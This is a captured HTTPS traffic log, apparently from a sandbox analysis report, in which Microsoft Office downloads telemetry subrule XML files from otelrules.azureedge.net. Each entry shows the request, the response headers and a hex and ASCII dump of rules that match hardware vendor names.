                                                                                                                                                                                                        2024-12-02 06:38:47 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:47 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                        x-ms-request-id: 270b7582-001e-008d-0fb3-42d91e000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063847Z-174f78459684db9fhC1EWRc7g40000000420000000006mhx
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:47 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        28192.168.2.84983213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:47 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:47 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                        x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063847Z-174f7845968pf68xhC1EWRr4h800000014cg000000001qxw
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:47 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        29192.168.2.84983413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:47 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:47 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                        x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063847Z-174f78459688l8rvhC1EWRtzr00000000gr0000000002h40
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:47 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        30192.168.2.84983313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:47 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:47 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                        x-ms-request-id: 7b1224ad-601e-0097-014f-44f33a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063847Z-174f7845968cdxdrhC1EWRg0en0000001440000000000dwq
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:48 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        31192.168.2.84983513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:47 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:47 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                        x-ms-request-id: 9f28f116-c01e-008d-51c7-432eec000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063847Z-174f7845968frfdmhC1EWRxxbw0000001440000000004tfk
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:48 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        32192.168.2.84983613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:49 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:49 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                        x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063849Z-174f7845968frfdmhC1EWRxxbw000000140000000000dnwn
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:50 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        33192.168.2.84983713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:49 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:49 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                        x-ms-request-id: 6ab56c84-d01e-008e-48c7-43387a000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063849Z-174f7845968swgbqhC1EWRmnb4000000148g0000000031c0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:50 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        34192.168.2.84983813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:49 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:50 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                        x-ms-request-id: fb105ca9-d01e-002b-5b00-4425fb000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063850Z-174f7845968glpgnhC1EWR7uec000000146g000000007y1k
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:50 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        35192.168.2.84983913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:49 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:50 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 464
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                        x-ms-request-id: 0e02d283-301e-000c-5b32-44323f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063850Z-174f7845968j6t2phC1EWRcfe8000000143g00000000dgpa
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:38:50 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        36192.168.2.84984013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:38:49 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:38:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:38:50 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                        x-ms-request-id: ef6c78e4-401e-0067-2ec7-4309c2000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063850Z-174f7845968pf68xhC1EWRr4h800000014ag0000000054hc
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
